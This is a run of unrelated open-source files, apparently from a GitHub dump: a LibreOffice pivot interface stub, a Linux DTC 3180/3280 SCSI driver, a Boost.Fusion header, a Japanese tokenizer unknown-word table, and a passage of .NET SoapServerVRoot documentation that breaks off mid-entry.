/*
* This file is part of the LibreOffice project.
*
* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/.
*
* This file incorporates work covered by the following license notice:
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed
* with this work for additional information regarding copyright
* ownership. The ASF licenses this file to you under the Apache
* License, Version 2.0 (the "License"); you may not use this file
* except in compliance with the License. You may obtain a copy of
* the License at http://www.apache.org/licenses/LICENSE-2.0 .
*/
interface Pivot
{
SID_PIVOT_RECALC [ ExecMethod = Execute; StateMethod = GetState; ]
SID_PIVOT_KILL [ ExecMethod = Execute; StateMethod = GetState; ]
SID_DP_FILTER [ ExecMethod = Execute; StateMethod = GetState; ]
}
shell ScPivotShell
{
import Pivot;
}
| {
"pile_set_name": "Github"
} |
#define AUTOSENSE
#define PSEUDO_DMA
#define DONT_USE_INTR
#define UNSAFE /* Leave interrupts enabled during pseudo-dma I/O */
#define xNDEBUG (NDEBUG_INTR+NDEBUG_RESELECTION+\
NDEBUG_SELECTION+NDEBUG_ARBITRATION)
#define DMA_WORKS_RIGHT
/*
* DTC 3180/3280 driver, by
* Ray Van Tassle [email protected]
*
* taken from ...
* Trantor T128/T128F/T228 driver by...
*
* Drew Eckhardt
* Visionary Computing
* (Unix and Linux consulting and custom programming)
* [email protected]
* +1 (303) 440-4894
*
* DISTRIBUTION RELEASE 1.
*
* For more information, please consult
*
* NCR 5380 Family
* SCSI Protocol Controller
* Databook
*/
/*
* Options :
* AUTOSENSE - if defined, REQUEST SENSE will be performed automatically
* for commands that return with a CHECK CONDITION status.
*
* PSEUDO_DMA - enables PSEUDO-DMA hardware, should give a 3-4X performance
* increase compared to polled I/O.
*
* PARITY - enable parity checking. Not supported.
*
* UNSAFE - leave interrupts enabled during pseudo-DMA transfers.
* You probably want this.
*
* The card is detected and initialized in one of several ways :
* 1. Autoprobe (default) - since the board is memory mapped,
* a BIOS signature is scanned for to locate the registers.
* An interrupt is triggered to autoprobe for the interrupt
* line.
*
* 2. With command line overrides - dtc=address,irq may be
* used on the LILO command line to override the defaults.
*
*/
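/*
 * Illustrative sketch (not part of the original driver): the two override
 * mechanisms described above, with hypothetical values. The boot-line format
 * follows the "dtc=address,irq" usage string in dtc_setup() below; the
 * OVERRIDE initializer shape is inferred from the struct override array it
 * feeds, not from any documented default.
 *
 *     kernel/LILO command line:  dtc=0xc8000,10
 *
 *     compile-time equivalent:   #define OVERRIDE { { 0xc8000, 10 } }
 */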
/*----------------------------------------------------------------*/
/* the following will set the monitor border color (useful to find
where something crashed or gets stuck at */
/* 1 = blue
2 = green
3 = cyan
4 = red
5 = magenta
6 = yellow
7 = white
*/
#if 0
#define rtrc(i) {inb(0x3da); outb(0x31, 0x3c0); outb((i), 0x3c0);}
#else
#define rtrc(i) {}
#endif
#include <linux/module.h>
#include <linux/signal.h>
#include <linux/blkdev.h>
#include <linux/delay.h>
#include <linux/stat.h>
#include <linux/string.h>
#include <linux/init.h>
#include <linux/interrupt.h>
#include <linux/io.h>
#include "scsi.h"
#include <scsi/scsi_host.h>
#include "dtc.h"
#define AUTOPROBE_IRQ
#include "NCR5380.h"
#define DTC_PUBLIC_RELEASE 2
/*
* The DTC3180 & 3280 boards are memory mapped.
*
*/
/*
*/
/* Offset from DTC_5380_OFFSET */
#define DTC_CONTROL_REG 0x100 /* rw */
#define D_CR_ACCESS 0x80 /* ro set=can access 3280 registers */
#define CSR_DIR_READ 0x40 /* rw direction, 1 = read 0 = write */
#define CSR_RESET 0x80 /* wo Resets 53c400 */
#define CSR_5380_REG 0x80 /* ro 5380 registers can be accessed */
#define CSR_TRANS_DIR 0x40 /* rw Data transfer direction */
#define CSR_SCSI_BUFF_INTR 0x20 /* rw Enable int on transfer ready */
#define CSR_5380_INTR 0x10 /* rw Enable 5380 interrupts */
#define CSR_SHARED_INTR 0x08 /* rw Interrupt sharing */
#define CSR_HOST_BUF_NOT_RDY 0x04 /* ro Host buffer not ready */
#define CSR_SCSI_BUF_RDY 0x02 /* ro SCSI buffer ready */
#define CSR_GATED_5380_IRQ 0x01 /* ro Last block xferred */
#define CSR_INT_BASE (CSR_SCSI_BUFF_INTR | CSR_5380_INTR)
#define DTC_BLK_CNT 0x101 /* rw - # of 128-byte blocks to transfer */
#define D_CR_ACCESS 0x80 /* ro set=can access 3280 registers */
#define DTC_SWITCH_REG 0x3982 /* ro - DIP switches */
#define DTC_RESUME_XFER 0x3982 /* wo - resume data xfer after disconnect/reconnect */
#define DTC_5380_OFFSET 0x3880 /* 8 registers here, see NCR5380.h */
/*!!!! for dtc, it's a 128 byte buffer at 3900 !!! */
#define DTC_DATA_BUF 0x3900 /* rw 128 bytes long */
static struct override {
unsigned int address;
int irq;
} overrides
#ifdef OVERRIDE
[] __initdata = OVERRIDE;
#else
[4] __initdata = {
{ 0, IRQ_AUTO }, { 0, IRQ_AUTO }, { 0, IRQ_AUTO }, { 0, IRQ_AUTO }
};
#endif
#define NO_OVERRIDES ARRAY_SIZE(overrides)
static struct base {
unsigned long address;
int noauto;
} bases[] __initdata = {
{ 0xcc000, 0 },
{ 0xc8000, 0 },
{ 0xdc000, 0 },
{ 0xd8000, 0 }
};
#define NO_BASES ARRAY_SIZE(bases)
static const struct signature {
const char *string;
int offset;
} signatures[] = {
{"DATA TECHNOLOGY CORPORATION BIOS", 0x25},
};
#define NO_SIGNATURES ARRAY_SIZE(signatures)
#ifndef MODULE
/*
* Function : dtc_setup(char *str, int *ints)
*
* Purpose : LILO command line initialization of the overrides array,
*
* Inputs : str - unused, ints - array of integer parameters with ints[0]
* equal to the number of ints.
*
*/
static void __init dtc_setup(char *str, int *ints)
{
static int commandline_current = 0;
int i;
if (ints[0] != 2)
printk("dtc_setup: usage dtc=address,irq\n");
else if (commandline_current < NO_OVERRIDES) {
overrides[commandline_current].address = ints[1];
overrides[commandline_current].irq = ints[2];
for (i = 0; i < NO_BASES; ++i)
if (bases[i].address == ints[1]) {
bases[i].noauto = 1;
break;
}
++commandline_current;
}
}
#endif
/*
* Function : int dtc_detect(struct scsi_host_template * tpnt)
*
* Purpose : detects and initializes DTC 3180/3280 controllers
* that were autoprobed, overridden on the LILO command line,
* or specified at compile time.
*
* Inputs : tpnt - template for this SCSI adapter.
*
* Returns : 1 if a host adapter was found, 0 if not.
*
*/
static int __init dtc_detect(struct scsi_host_template * tpnt)
{
static int current_override = 0, current_base = 0;
struct Scsi_Host *instance;
unsigned int addr;
void __iomem *base;
int sig, count;
tpnt->proc_name = "dtc3x80";
tpnt->proc_info = &dtc_proc_info;
for (count = 0; current_override < NO_OVERRIDES; ++current_override) {
addr = 0;
base = NULL;
if (overrides[current_override].address) {
addr = overrides[current_override].address;
base = ioremap(addr, 0x2000);
if (!base)
addr = 0;
} else
for (; !addr && (current_base < NO_BASES); ++current_base) {
#if (DTCDEBUG & DTCDEBUG_INIT)
printk(KERN_DEBUG "scsi-dtc : probing address %08x\n", bases[current_base].address);
#endif
if (bases[current_base].noauto)
continue;
base = ioremap(bases[current_base].address, 0x2000);
if (!base)
continue;
for (sig = 0; sig < NO_SIGNATURES; ++sig) {
if (check_signature(base + signatures[sig].offset, signatures[sig].string, strlen(signatures[sig].string))) {
addr = bases[current_base].address;
#if (DTCDEBUG & DTCDEBUG_INIT)
printk(KERN_DEBUG "scsi-dtc : detected board.\n");
#endif
goto found;
}
}
iounmap(base);
}
#if defined(DTCDEBUG) && (DTCDEBUG & DTCDEBUG_INIT)
printk(KERN_DEBUG "scsi-dtc : base = %08x\n", addr);
#endif
if (!addr)
break;
found:
instance = scsi_register(tpnt, sizeof(struct NCR5380_hostdata));
if (instance == NULL)
break;
instance->base = addr;
((struct NCR5380_hostdata *)(instance)->hostdata)->base = base;
NCR5380_init(instance, 0);
NCR5380_write(DTC_CONTROL_REG, CSR_5380_INTR); /* Enable int's */
if (overrides[current_override].irq != IRQ_AUTO)
instance->irq = overrides[current_override].irq;
else
instance->irq = NCR5380_probe_irq(instance, DTC_IRQS);
#ifndef DONT_USE_INTR
/* With interrupts enabled, it will sometimes hang when doing heavy
* reads. So better not enable them until I figure it out. */
if (instance->irq != SCSI_IRQ_NONE)
if (request_irq(instance->irq, dtc_intr, IRQF_DISABLED,
"dtc", instance)) {
printk(KERN_ERR "scsi%d : IRQ%d not free, interrupts disabled\n", instance->host_no, instance->irq);
instance->irq = SCSI_IRQ_NONE;
}
if (instance->irq == SCSI_IRQ_NONE) {
printk(KERN_WARNING "scsi%d : interrupts not enabled. for better interactive performance,\n", instance->host_no);
printk(KERN_WARNING "scsi%d : please jumper the board for a free IRQ.\n", instance->host_no);
}
#else
if (instance->irq != SCSI_IRQ_NONE)
printk(KERN_WARNING "scsi%d : interrupts not used. Might as well not jumper it.\n", instance->host_no);
instance->irq = SCSI_IRQ_NONE;
#endif
#if defined(DTCDEBUG) && (DTCDEBUG & DTCDEBUG_INIT)
printk("scsi%d : irq = %d\n", instance->host_no, instance->irq);
#endif
printk(KERN_INFO "scsi%d : at 0x%05X", instance->host_no, (int) instance->base);
if (instance->irq == SCSI_IRQ_NONE)
printk(" interrupts disabled");
else
printk(" irq %d", instance->irq);
printk(" options CAN_QUEUE=%d CMD_PER_LUN=%d release=%d", CAN_QUEUE, CMD_PER_LUN, DTC_PUBLIC_RELEASE);
NCR5380_print_options(instance);
printk("\n");
++current_override;
++count;
}
return count;
}
/*
* Function : int dtc_biosparam(Disk * disk, struct block_device *dev, int *ip)
*
* Purpose : Generates a BIOS / DOS compatible H-C-S mapping for
* the specified device / size.
*
* Inputs : size = size of device in sectors (512 bytes), dev = block device
* major / minor, ip[] = {heads, sectors, cylinders}
*
* Returns : always 0 (success), initializes ip
*
*/
/*
* XXX Most SCSI boards use this mapping, but I could be incorrect. Someone
* using hard disks on a Trantor should verify that this mapping corresponds
* to that used by the BIOS / ASPI driver by running the Linux fdisk program
* and matching the H-C-S coordinates to what DOS uses.
*/
static int dtc_biosparam(struct scsi_device *sdev, struct block_device *dev,
sector_t capacity, int *ip)
{
int size = capacity;
ip[0] = 64;
ip[1] = 32;
ip[2] = size >> 11;
return 0;
}
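/*
 * Worked example (illustrative): with the fixed 64-head, 32-sector geometry
 * above, a disk of 2097152 512-byte sectors (1 GiB) maps to
 * 2097152 >> 11 = 1024 cylinders, i.e. ip[] = {64, 32, 1024}.
 */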
/****************************************************************
* Function : int NCR5380_pread (struct Scsi_Host *instance,
* unsigned char *dst, int len)
*
* Purpose : Fast 5380 pseudo-dma read function, reads len bytes to
* dst
*
* Inputs : dst = destination, len = length in bytes
*
* Returns : 0 on success, non zero on a failure such as a watchdog
* timeout.
*/
static int dtc_maxi = 0;
static int dtc_wmaxi = 0;
static inline int NCR5380_pread(struct Scsi_Host *instance, unsigned char *dst, int len)
{
unsigned char *d = dst;
int i; /* For counting time spent in the poll-loop */
NCR5380_local_declare();
NCR5380_setup(instance);
i = 0;
NCR5380_read(RESET_PARITY_INTERRUPT_REG);
NCR5380_write(MODE_REG, MR_ENABLE_EOP_INTR | MR_DMA_MODE);
if (instance->irq == SCSI_IRQ_NONE)
NCR5380_write(DTC_CONTROL_REG, CSR_DIR_READ);
else
NCR5380_write(DTC_CONTROL_REG, CSR_DIR_READ | CSR_INT_BASE);
NCR5380_write(DTC_BLK_CNT, len >> 7); /* Block count */
rtrc(1);
while (len > 0) {
rtrc(2);
while (NCR5380_read(DTC_CONTROL_REG) & CSR_HOST_BUF_NOT_RDY)
++i;
rtrc(3);
memcpy_fromio(d, base + DTC_DATA_BUF, 128);
d += 128;
len -= 128;
rtrc(7);
/*** With interrupts on, it sometimes hangs after here.
* Looks like something makes HBNR go away. */
}
rtrc(4);
while (!(NCR5380_read(DTC_CONTROL_REG) & D_CR_ACCESS))
++i;
NCR5380_write(MODE_REG, 0); /* Clear the operating mode */
rtrc(0);
NCR5380_read(RESET_PARITY_INTERRUPT_REG);
if (i > dtc_maxi)
dtc_maxi = i;
return (0);
}
/****************************************************************
* Function : int NCR5380_pwrite (struct Scsi_Host *instance,
* unsigned char *src, int len)
*
* Purpose : Fast 5380 pseudo-dma write function, transfers len bytes from
* src
*
* Inputs : src = source, len = length in bytes
*
* Returns : 0 on success, non zero on a failure such as a watchdog
* timeout.
*/
static inline int NCR5380_pwrite(struct Scsi_Host *instance, unsigned char *src, int len)
{
int i;
NCR5380_local_declare();
NCR5380_setup(instance);
NCR5380_read(RESET_PARITY_INTERRUPT_REG);
NCR5380_write(MODE_REG, MR_ENABLE_EOP_INTR | MR_DMA_MODE);
/* set direction (write) */
if (instance->irq == SCSI_IRQ_NONE)
NCR5380_write(DTC_CONTROL_REG, 0);
else
NCR5380_write(DTC_CONTROL_REG, CSR_5380_INTR);
NCR5380_write(DTC_BLK_CNT, len >> 7); /* Block count */
for (i = 0; len > 0; ++i) {
rtrc(5);
/* Poll until the host buffer can accept data. */
while (NCR5380_read(DTC_CONTROL_REG) & CSR_HOST_BUF_NOT_RDY)
++i;
rtrc(3);
memcpy_toio(base + DTC_DATA_BUF, src, 128);
src += 128;
len -= 128;
}
rtrc(4);
while (!(NCR5380_read(DTC_CONTROL_REG) & D_CR_ACCESS))
++i;
rtrc(6);
/* Wait until the last byte has been sent to the disk */
while (!(NCR5380_read(TARGET_COMMAND_REG) & TCR_LAST_BYTE_SENT))
++i;
rtrc(7);
/* Check for parity error here. fixme. */
NCR5380_write(MODE_REG, 0); /* Clear the operating mode */
rtrc(0);
if (i > dtc_wmaxi)
dtc_wmaxi = i;
return (0);
}
MODULE_LICENSE("GPL");
#include "NCR5380.c"
static int dtc_release(struct Scsi_Host *shost)
{
NCR5380_local_declare();
NCR5380_setup(shost);
if (shost->irq)
free_irq(shost->irq, shost);
NCR5380_exit(shost);
if (shost->io_port && shost->n_io_port)
release_region(shost->io_port, shost->n_io_port);
scsi_unregister(shost);
iounmap(base);
return 0;
}
static struct scsi_host_template driver_template = {
.name = "DTC 3180/3280 ",
.detect = dtc_detect,
.release = dtc_release,
.queuecommand = dtc_queue_command,
.eh_abort_handler = dtc_abort,
.eh_bus_reset_handler = dtc_bus_reset,
.bios_param = dtc_biosparam,
.can_queue = CAN_QUEUE,
.this_id = 7,
.sg_tablesize = SG_ALL,
.cmd_per_lun = CMD_PER_LUN,
.use_clustering = DISABLE_CLUSTERING,
};
#include "scsi_module.c"
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2013 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.lslboost.org/LICENSE_1_0.txt)
==============================================================================*/
#if !defined(FUSION_MAKE_DEQUE_01272013_1401)
#define FUSION_MAKE_DEQUE_01272013_1401
#include <lslboost/fusion/container/deque/deque.hpp>
#if !defined(BOOST_FUSION_HAS_VARIADIC_DEQUE)
# include <lslboost/fusion/container/generation/detail/pp_make_deque.hpp>
#else
///////////////////////////////////////////////////////////////////////////////
// C++11 variadic interface
///////////////////////////////////////////////////////////////////////////////
#include <lslboost/fusion/support/detail/as_fusion_element.hpp>
namespace lslboost { namespace fusion
{
namespace result_of
{
template <typename ...T>
struct make_deque
{
typedef deque<T...> type;
};
}
template <typename ...T>
inline deque<typename detail::as_fusion_element<T>::type...>
make_deque(T const&... arg)
{
return deque<typename detail::as_fusion_element<T>::type...>(arg...);
}
}}
#endif
#endif
| {
"pile_set_name": "Github"
} |
DEFAULT,5968,5968,3857,補助記号,一般,*,*,*,*
SPACE,5966,5966,6056,空白,*,*,*,*,*
KANJI,5139,5139,14657,名詞,普通名詞,一般,*,*,*
KANJI,5129,5129,17308,名詞,普通名詞,サ変可能,*,*,*
KANJI,4785,4785,18181,名詞,固有名詞,一般,*,*,*
KANJI,4787,4787,18086,名詞,固有名詞,人名,一般,*,*
KANJI,4791,4791,19198,名詞,固有名詞,地名,一般,*,*
SYMBOL,5129,5129,17094,名詞,普通名詞,サ変可能,*,*,*
NUMERIC,4794,4794,12450,名詞,数詞,*,*,*,*
ALPHA,5139,5139,11633,名詞,普通名詞,一般,*,*,*
ALPHA,4785,4785,13620,名詞,固有名詞,一般,*,*,*
ALPHA,4787,4787,14228,名詞,固有名詞,人名,一般,*,*
ALPHA,4791,4791,15793,名詞,固有名詞,地名,一般,*,*
ALPHA,5687,5687,15246,感動詞,一般,*,*,*,*
HIRAGANA,5139,5139,16012,名詞,普通名詞,一般,*,*,*
HIRAGANA,5129,5129,20012,名詞,普通名詞,サ変可能,*,*,*
HIRAGANA,4785,4785,18282,名詞,固有名詞,一般,*,*,*
HIRAGANA,4787,4787,18269,名詞,固有名詞,人名,一般,*,*
HIRAGANA,4791,4791,20474,名詞,固有名詞,地名,一般,*,*
HIRAGANA,5687,5687,17786,感動詞,一般,*,*,*,*
KATAKANA,5139,5139,10980,名詞,普通名詞,一般,*,*,*
KATAKANA,5129,5129,14802,名詞,普通名詞,サ変可能,*,*,*
KATAKANA,4785,4785,13451,名詞,固有名詞,一般,*,*,*
KATAKANA,4787,4787,13759,名詞,固有名詞,人名,一般,*,*
KATAKANA,4791,4791,14554,名詞,固有名詞,地名,一般,*,*
KATAKANA,5687,5687,15272,感動詞,一般,*,*,*,*
KANJINUMERIC,4794,4794,14170,名詞,数詞,*,*,*,*
GREEK,5139,5139,11051,名詞,普通名詞,一般,*,*,*
GREEK,4785,4785,13353,名詞,固有名詞,一般,*,*,*
GREEK,4787,4787,13671,名詞,固有名詞,人名,一般,*,*
GREEK,4791,4791,14862,名詞,固有名詞,地名,一般,*,*
CYRILLIC,5139,5139,11140,名詞,普通名詞,一般,*,*,*
CYRILLIC,4785,4785,13174,名詞,固有名詞,一般,*,*,*
CYRILLIC,4787,4787,13495,名詞,固有名詞,人名,一般,*,*
CYRILLIC,4791,4791,14700,名詞,固有名詞,地名,一般,*,*
| {
"pile_set_name": "Github"
} |
<Type Name="SoapServerVRoot" FullName="System.EnterpriseServices.Internal.SoapServerVRoot">
<TypeSignature Language="C#" Value="public sealed class SoapServerVRoot : System.EnterpriseServices.Internal.ISoapServerVRoot" />
<TypeSignature Language="ILAsm" Value=".class public auto ansi sealed beforefieldinit SoapServerVRoot extends System.Object implements class System.EnterpriseServices.Internal.ISoapServerVRoot" />
<TypeSignature Language="DocId" Value="T:System.EnterpriseServices.Internal.SoapServerVRoot" />
<TypeSignature Language="VB.NET" Value="Public NotInheritable Class SoapServerVRoot
Implements ISoapServerVRoot" />
<TypeSignature Language="C++ CLI" Value="public ref class SoapServerVRoot sealed : System::EnterpriseServices::Internal::ISoapServerVRoot" />
<TypeSignature Language="F#" Value="type SoapServerVRoot = class
 interface ISoapServerVRoot" />
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Base>
<BaseTypeName>System.Object</BaseTypeName>
</Base>
<Interfaces>
<Interface>
<InterfaceName>System.EnterpriseServices.Internal.ISoapServerVRoot</InterfaceName>
</Interface>
</Interfaces>
<Attributes>
<Attribute>
<AttributeName Language="C#">[System.Runtime.InteropServices.Guid("CAA817CC-0C04-4d22-A05C-2B7E162F4E8F")]</AttributeName>
<AttributeName Language="F#">[<System.Runtime.InteropServices.Guid("CAA817CC-0C04-4d22-A05C-2B7E162F4E8F")>]</AttributeName>
</Attribute>
</Attributes>
<Docs>
<summary>Publishes authenticated, encrypted SOAP virtual roots on servers. This class cannot be inherited.</summary>
<remarks>
<format type="text/markdown"><![CDATA[
## Remarks
<xref:System.EnterpriseServices.Internal.SoapServerVRoot> is used internally by the .NET Framework. You do not need to use it directly in your code.
]]></format>
</remarks>
</Docs>
<Members>
<Member MemberName=".ctor">
<MemberSignature Language="C#" Value="public SoapServerVRoot ();" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig specialname rtspecialname instance void .ctor() cil managed" />
<MemberSignature Language="DocId" Value="M:System.EnterpriseServices.Internal.SoapServerVRoot.#ctor" />
<MemberSignature Language="VB.NET" Value="Public Sub New ()" />
<MemberSignature Language="C++ CLI" Value="public:
 SoapServerVRoot();" />
<MemberType>Constructor</MemberType>
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<Parameters />
<Docs>
<summary>Initializes a new instance of the <see cref="T:System.EnterpriseServices.Internal.SoapServerVRoot" /> class.</summary>
<remarks>To be added.</remarks>
</Docs>
</Member>
<Member MemberName="CreateVirtualRootEx">
<MemberSignature Language="C#" Value="public void CreateVirtualRootEx (string rootWebServer, string inBaseUrl, string inVirtualRoot, string homePage, string discoFile, string secureSockets, string authentication, string operation, out string baseUrl, out string virtualRoot, out string physicalPath);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig newslot virtual instance void CreateVirtualRootEx(string rootWebServer, string inBaseUrl, string inVirtualRoot, string homePage, string discoFile, string secureSockets, string authentication, string operation, [out] string& baseUrl, [out] string& virtualRoot, [out] string& physicalPath) cil managed" />
<MemberSignature Language="DocId" Value="M:System.EnterpriseServices.Internal.SoapServerVRoot.CreateVirtualRootEx(System.String,System.String,System.String,System.String,System.String,System.String,System.String,System.String,System.String@,System.String@,System.String@)" />
<MemberSignature Language="VB.NET" Value="Public Sub CreateVirtualRootEx (rootWebServer As String, inBaseUrl As String, inVirtualRoot As String, homePage As String, discoFile As String, secureSockets As String, authentication As String, operation As String, ByRef baseUrl As String, ByRef virtualRoot As String, ByRef physicalPath As String)" />
<MemberSignature Language="C++ CLI" Value="public:
 virtual void CreateVirtualRootEx(System::String ^ rootWebServer, System::String ^ inBaseUrl, System::String ^ inVirtualRoot, System::String ^ homePage, System::String ^ discoFile, System::String ^ secureSockets, System::String ^ authentication, System::String ^ operation, [Runtime::InteropServices::Out] System::String ^ % baseUrl, [Runtime::InteropServices::Out] System::String ^ % virtualRoot, [Runtime::InteropServices::Out] System::String ^ % physicalPath);" />
<MemberSignature Language="F#" Value="abstract member CreateVirtualRootEx : string * string * string * string * string * string * string * string * string * string * string -> unit
override this.CreateVirtualRootEx : string * string * string * string * string * string * string * string * string * string * string -> unit" Usage="soapServerVRoot.CreateVirtualRootEx (rootWebServer, inBaseUrl, inVirtualRoot, homePage, discoFile, secureSockets, authentication, operation, baseUrl, virtualRoot, physicalPath)" />
<MemberType>Method</MemberType>
<Implements>
<InterfaceMember>M:System.EnterpriseServices.Internal.ISoapServerVRoot.CreateVirtualRootEx(System.String,System.String,System.String,System.String,System.String,System.String,System.String,System.String,System.String@,System.String@,System.String@)</InterfaceMember>
</Implements>
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<ReturnValue>
<ReturnType>System.Void</ReturnType>
</ReturnValue>
<Parameters>
<Parameter Name="rootWebServer" Type="System.String" />
<Parameter Name="inBaseUrl" Type="System.String" />
<Parameter Name="inVirtualRoot" Type="System.String" />
<Parameter Name="homePage" Type="System.String" />
<Parameter Name="discoFile" Type="System.String" />
<Parameter Name="secureSockets" Type="System.String" />
<Parameter Name="authentication" Type="System.String" />
<Parameter Name="operation" Type="System.String" />
<Parameter Name="baseUrl" Type="System.String" RefType="out" />
<Parameter Name="virtualRoot" Type="System.String" RefType="out" />
<Parameter Name="physicalPath" Type="System.String" RefType="out" />
</Parameters>
<Docs>
<param name="rootWebServer">The root Web server. The default is "IIS://localhost/W3SVC/1/ROOT".</param>
<param name="inBaseUrl">The base URL that contains the virtual root.</param>
<param name="inVirtualRoot">The name of the virtual root.</param>
<param name="homePage">The URL of the home page.</param>
<param name="discoFile">
<see langword="true" /> if a default discovery file is to be created; <see langword="false" /> if there is to be no discovery file. If <see langword="false" /> and a Default.disco file exists, the file is deleted.</param>
<param name="secureSockets">
<see langword="true" /> if SSL encryption is required; otherwise, <see langword="false" />.</param>
<param name="authentication">Specify "anonymous" if no authentication is to be used (anonymous user). Otherwise, specify an empty string.</param>
<param name="operation">Not used. Specify <see langword="null" /> for this parameter.</param>
<param name="baseUrl">When this method returns, this parameter contains the base URL.</param>
<param name="virtualRoot">When this method returns, this parameter contains the name of the virtual root.</param>
<param name="physicalPath">When this method returns, this parameter contains the disk address of the Virtual Root directory.</param>
<summary>Creates a SOAP virtual root with security options.</summary>
<remarks>To be added.</remarks>
<exception cref="T:System.Security.SecurityException">A caller in the call chain does not have permission to access unmanaged code.</exception>
<exception cref="T:System.PlatformNotSupportedException">The SOAP utility is not available.</exception>
</Docs>
</Member>
<Member MemberName="DeleteVirtualRootEx">
<MemberSignature Language="C#" Value="public void DeleteVirtualRootEx (string rootWebServer, string inBaseUrl, string inVirtualRoot);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig newslot virtual instance void DeleteVirtualRootEx(string rootWebServer, string inBaseUrl, string inVirtualRoot) cil managed" />
<MemberSignature Language="DocId" Value="M:System.EnterpriseServices.Internal.SoapServerVRoot.DeleteVirtualRootEx(System.String,System.String,System.String)" />
<MemberSignature Language="VB.NET" Value="Public Sub DeleteVirtualRootEx (rootWebServer As String, inBaseUrl As String, inVirtualRoot As String)" />
<MemberSignature Language="C++ CLI" Value="public:
 virtual void DeleteVirtualRootEx(System::String ^ rootWebServer, System::String ^ inBaseUrl, System::String ^ inVirtualRoot);" />
<MemberSignature Language="F#" Value="abstract member DeleteVirtualRootEx : string * string * string -> unit
override this.DeleteVirtualRootEx : string * string * string -> unit" Usage="soapServerVRoot.DeleteVirtualRootEx (rootWebServer, inBaseUrl, inVirtualRoot)" />
<MemberType>Method</MemberType>
<Implements>
<InterfaceMember>M:System.EnterpriseServices.Internal.ISoapServerVRoot.DeleteVirtualRootEx(System.String,System.String,System.String)</InterfaceMember>
</Implements>
<AssemblyInfo>
<AssemblyName>System.EnterpriseServices</AssemblyName>
<AssemblyVersion>1.0.5000.0</AssemblyVersion>
<AssemblyVersion>2.0.0.0</AssemblyVersion>
<AssemblyVersion>4.0.0.0</AssemblyVersion>
</AssemblyInfo>
<ReturnValue>
<ReturnType>System.Void</ReturnType>
</ReturnValue>
<Parameters>
<Parameter Name="rootWebServer" Type="System.String" />
<Parameter Name="inBaseUrl" Type="System.String" />
<Parameter Name="inVirtualRoot" Type="System.String" />
</Parameters>
<Docs>
<param name="rootWebServer">The root Web server. The default is "IIS://localhost/W3SVC/1/ROOT".</param>
<param name="inBaseUrl">The base URL that contains the virtual root.</param>
<param name="inVirtualRoot">The name of the virtual root.</param>
<summary>Deletes a virtual root. Not fully implemented.</summary>
<remarks>
<format type="text/markdown"><![CDATA[
## Remarks
The functionality to delete a virtual root is not yet available.
> [!CAUTION]
> This method returns without deleting the virtual root.
]]></format>
</remarks>
<exception cref="T:System.Security.SecurityException">A caller in the call chain does not have permission to access unmanaged code.</exception>
<exception cref="T:System.PlatformNotSupportedException">The SOAP utility is not available.</exception>
<exception cref="T:System.EnterpriseServices.ServicedComponentException">The call to get the system directory failed.</exception>
</Docs>
</Member>
<Member MemberName="GetVirtualRootStatus">
<MemberSignature Language="C#" Value="public void GetVirtualRootStatus (string RootWebServer, string inBaseUrl, string inVirtualRoot, out string Exists, out string SSL, out string WindowsAuth, out string Anonymous, out string HomePage, out string DiscoFile, out string PhysicalPath, out string BaseUrl, out string VirtualRoot);" />
<MemberSignature Language="ILAsm" Value=".method public hidebysig newslot virtual instance void GetVirtualRootStatus(string RootWebServer, string inBaseUrl, string inVirtualRoot, [out] string& Exists, [out] string& SSL, [out] string& WindowsAuth, [out] string& Anonymous, [out] string& HomePage, [out] string& DiscoFile, [out] string& PhysicalPath, [out] string& BaseUrl, [out] string& VirtualRoot) cil managed" />
<MemberSignature Language="DocId" Value="M:System.EnterpriseServices.Internal.SoapServerVRoot.GetVirtualRootStatus(System.String,System.String,System.String,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@,System.String@)" />
<MemberSignature Language="VB.NET" Value="Public Sub GetVirtualRootStatus (RootWebServer As String, inBaseUrl As String, inVirtualRoot As String, ByRef Exists As String, ByRef SSL As String, ByRef WindowsAuth As String, ByRef Anonymous As String, ByRef HomePage As String, ByRef DiscoFile As String, ByRef PhysicalPath As String, ByRef BaseUrl As String, ByRef VirtualRoot As String)" />
<MemberSignature Language="C++ CLI" Value="public:
 virtual void GetVirtualRootStatus(System::String ^ RootWebServer, System::String ^ inBaseUrl, System::String ^ inVirtualRoot, [Runtime::InteropServices::Out] System::String ^ % Exists, [Runtime::InteropServices::Out] System::String ^ % SSL, [Runtime::InteropServices::Out] System::String ^ % WindowsAuth, [Runtime::InteropServices::Out] System::String ^ % Anonymous, [Runtime::InteropServices::Out] System::String ^ % HomePage, [Runtime::InteropServices::Out] System::String ^ % DiscoFile, [Runtime::InteropServices::Out] System::String ^ % PhysicalPath, [Runtime::InteropServices::Out] System::String ^ % BaseUrl, [Runtime::InteropServices::Out] System::String ^ % VirtualRoot);" />
<MemberSignature Language="F#" Value="abstract member GetVirtualRootStatus : string * string * string * string * string * string * string * string * string * string * string * string -> unit
override this.GetVirtualRootStatus : string * string * string * string * string * string * string * string * string * string * string * string -> unit" Usage="soapServerVRoot.GetVirtualRootStatus (RootWebServer, inBaseUrl, inVirtualRoot, Exists, SSL, WindowsAuth, Anonymous, HomePage, DiscoFile, PhysicalPath, BaseUrl, VirtualRoot)" />
<MemberType>Method</MemberType>
<Implements>
